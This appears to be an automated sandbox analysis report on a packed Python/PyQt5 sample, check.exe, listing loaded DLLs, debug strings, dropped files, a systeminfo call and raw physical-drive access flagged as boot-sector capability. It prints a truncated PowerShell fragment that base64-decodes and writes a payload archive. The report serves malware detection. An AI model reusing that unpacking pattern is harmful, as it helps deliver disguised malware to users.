Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: download.ps1

Static file information: File size 51316505 > 1048576

Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconengines\qsvgicon.pdb source: check.exe, 00000004.00000003.1791390585.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.1792660148.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000005.00000002.2170173659.00007FFBA0E47000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.1764181541.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2202836446.00007FFBBC703000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: check.exe, 00000005.00000002.2172607096.00007FFBA129A000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: check.exe, 00000005.00000002.2183774332.00007FFBA9895000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2184592817.00007FFBA9935000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2175053692.00007FFBA17D6000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1792161641.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2172607096.00007FFBA1202000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000005.00000002.2194580325.00007FFBB5CD4000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000005.00000002.2194580325.00007FFBB5CD4000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2172607096.00007FFBA129A000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.1779981685.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2201831662.00007FFBBC155000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000005.00000002.2200750849.00007FFBBBE93000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2203368658.00007FFBC1A27000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2203368658.00007FFBC1A27000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2188337968.00007FFBB1893000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000005.00000002.2200254820.00007FFBBB746000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1792161641.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2175053692.00007FFBA17D6000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: check.exe, 00000005.00000002.2191613703.00007FFBB5C1D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2163791427.00007FFBA069A000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: check.exe, 00000005.00000002.2203785112.00007FFBC1B34000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000005.00000002.2189414783.00007FFBB4C49000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: check.exe, 00000005.00000002.2183774332.00007FFBA9895000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.1779557070.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2185925889.00007FFBAB9BE000.00000002.00000001.01000000.00000019.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String(${random_encoded_data});[System.IO.File]::WriteAllBytes(${random_archive_file},${random_decoded_bytes});${random_new_item}=New-Item -ItemType Directory -Path ${random_install_path};tr

Source: VCRUNTIME140.dll.4.dr

Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]

Source: MSVCP140.dll.4.dr	Static PE information: section name: .didat
Source: Qt5Core.dll.4.dr	Static PE information: section name: .qtmimed
Source: VCRUNTIME140.dll.4.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.4.dr	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll0.4.dr	Static PE information: section name: _RDATA
Source: opengl32sw.dll.4.dr	Static PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.4.dr	Static PE information: section name: .qtmetad
Source: qsvgicon.dll.4.dr	Static PE information: section name: .qtmetad
Source: qgif.dll.4.dr	Static PE information: section name: .qtmetad
Source: qicns.dll.4.dr	Static PE information: section name: .qtmetad
Source: qico.dll.4.dr	Static PE information: section name: .qtmetad
Source: qjpeg.dll.4.dr	Static PE information: section name: .qtmetad
Source: qsvg.dll.4.dr	Static PE information: section name: .qtmetad
Source: libcrypto-3.dll.4.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.4.dr	Static PE information: section name: .00cfg
Source: python313.dll.4.dr	Static PE information: section name: PyRuntim
Source: qtga.dll.4.dr	Static PE information: section name: .qtmetad
Source: qtiff.dll.4.dr	Static PE information: section name: .qtmetad
Source: qwbmp.dll.4.dr	Static PE information: section name: .qtmetad
Source: qwebp.dll.4.dr	Static PE information: section name: .qtmetad
Source: qminimal.dll.4.dr	Static PE information: section name: .qtmetad
Source: qoffscreen.dll.4.dr	Static PE information: section name: .qtmetad
Source: qwebgl.dll.4.dr	Static PE information: section name: .qtmetad
Source: qwindows.dll.4.dr	Static PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.4.dr	Static PE information: section name: .qtmetad
Source: qwindowsvistastyle.dll.4.dr	Static PE information: section name: .qtmetad
Source: VCRUNTIME140.dll.6.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.6.dr	Static PE information: section name: _RDATA
Source: MSVCP140.dll.6.dr	Static PE information: section name: .didat
Source: Qt5Core.dll.6.dr	Static PE information: section name: .qtmimed
Source: libcrypto-3.dll.6.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.6.dr	Static PE information: section name: .00cfg
Source: VCRUNTIME140.dll0.6.dr	Static PE information: section name: _RDATA
Source: python313.dll.6.dr	Static PE information: section name: PyRuntim
Source: opengl32sw.dll.6.dr	Static PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.6.dr	Static PE information: section name: .qtmetad
Source: qsvgicon.dll.6.dr	Static PE information: section name: .qtmetad
Source: qgif.dll.6.dr	Static PE information: section name: .qtmetad
Source: qicns.dll.6.dr	Static PE information: section name: .qtmetad
Source: qico.dll.6.dr	Static PE information: section name: .qtmetad
Source: qjpeg.dll.6.dr	Static PE information: section name: .qtmetad
Source: qsvg.dll.6.dr	Static PE information: section name: .qtmetad
Source: qtga.dll.6.dr	Static PE information: section name: .qtmetad
Source: qtiff.dll.6.dr	Static PE information: section name: .qtmetad
Source: qwbmp.dll.6.dr	Static PE information: section name: .qtmetad
Source: qwebp.dll.6.dr	Static PE information: section name: .qtmetad
Source: qminimal.dll.6.dr	Static PE information: section name: .qtmetad
Source: qoffscreen.dll.6.dr	Static PE information: section name: .qtmetad
Source: qwebgl.dll.6.dr	Static PE information: section name: .qtmetad
Source: qwindows.dll.6.dr	Static PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.6.dr	Static PE information: section name: .qtmetad

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, \\.\PhysicalDrive%d	16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, PhysicalDrive%i	16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i	16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i	16_2_00007FFB9DD62B00

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Gui.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
